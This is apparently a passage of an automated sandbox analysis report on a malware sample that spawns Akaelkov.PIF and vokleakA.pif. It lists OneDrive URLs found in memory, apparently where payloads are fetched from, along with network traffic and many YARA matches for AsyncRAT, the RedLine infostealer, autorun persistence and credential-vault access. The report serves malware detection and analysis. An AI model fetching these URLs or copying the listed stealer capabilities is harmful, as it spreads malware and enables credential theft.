              Source: Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypeqqw.sn.files.1drv.com/y4m_0zffjQKuzcWV-4RzvUr745PZwF21rnv86bmrYUTERnhgMrc3IjhKSzlEeoFvlew
              Source: Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypeqqw.sn.files.1drv.com/y4mu4Z1NRH3ttdRusRHzE_iL9RsVmfGh0d(
              Source: Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypeqqw.sn.files.1drv.com/y4mu4Z1NRH3ttdRusRHzE_iL9RsVmfGh0diSajIfz1Wvx3WSkuRSeIcn76go1fI4MM8
              Source: Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000002.2236274248.0000000000942000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypeqqw.sn.files.1drv.com/y4mwHuOHrKe-2pkzFSdtlFI_dWIyQPnyES3yKggJ0j1NfQxFwS0bEZy-I6gOyWDAEQA
              Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypeqqw.sn.files.1drv.com:443/y4m7sysDQdikYirqK3HU2YBJGcfNuayvML9a1KtZdylT83JiYtGvaZtziPItDVf
              Source: Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypeqqw.sn.files.1drv.com:443/y4mu4Z1NRH3ttdRusRHzE_iL9RsVmfGh0diSajIfz1Wvx3WSkuRSeIcn76go1fI
              Source: Akaelkov.PIF, 00000008.00000002.2236274248.000000000093E000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypeqqw.sn.files.1drv.com:443/y4mwHuOHrKe-2pkzFSdtlFI_dWIyQPnyES3yKggJ0j1NfQxFwS0bEZy-I6gOyWD
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownHTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.43.11:443 -> 192.168.2.5:49718 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 3716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 6096, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vokleakA.pif PID: 2072, type: MEMORYSTR
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, umlRMRbjNqD.cs.Net Code: lMoL
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_04124F7C GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,0_2_04124F7C
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0413F140 GetMessagePos,GetKeyboardState,0_2_0413F140

              System Summary

              barindex
              Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.284a0000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.34490000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 9.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 9.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 4.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 7.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 9.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.3305d590.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.284a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.31b94ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.26fc6458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.26fc5570.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.32f4d590.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.2701d590.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.32ef6458.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.26fc5570.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.34490ee8.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.34c30000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.3.vokleakA.pif.2436fa40.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.3.vokleakA.pif.2ff3d950.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.284a0ee8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.31b94ec6.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.31e40ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.32ef6458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.31e40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.26fc6458.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.3.vokleakA.pif.2436fa40.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.33005570.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.31b93fde.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.33006458.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.25de4ec6.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.31be4ec6.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.2.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.28550000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.33005570.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 4.2.vokleakA.pif.31be3fde.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.32f4d590.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 4.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
